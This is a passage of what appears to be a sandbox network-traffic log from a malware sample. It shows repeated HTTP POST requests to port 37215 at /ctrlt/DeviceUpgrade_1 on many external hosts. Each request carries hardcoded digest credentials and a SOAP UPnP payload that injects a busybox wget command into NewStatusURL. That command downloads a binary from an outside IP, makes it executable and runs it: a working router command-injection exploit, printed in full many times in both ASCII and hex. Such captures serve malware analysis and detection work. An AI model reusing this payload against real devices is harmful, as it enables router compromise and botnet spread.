                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1048192.168.2.1556296222.163.60.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929122925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1049192.168.2.1548828138.68.238.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929122925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1050192.168.2.1549456190.192.57.19737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929136038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1051192.168.2.1560824190.22.75.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929151058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1052192.168.2.1555506138.233.27.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929183006 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1053192.168.2.155518631.151.230.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929186106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1054192.168.2.1537030183.189.84.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929219007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1055192.168.2.1545404121.153.127.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929219007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1056192.168.2.154749694.197.199.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929238081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1057192.168.2.1541810102.31.233.18737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929274082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1058192.168.2.154714094.23.148.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929275990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
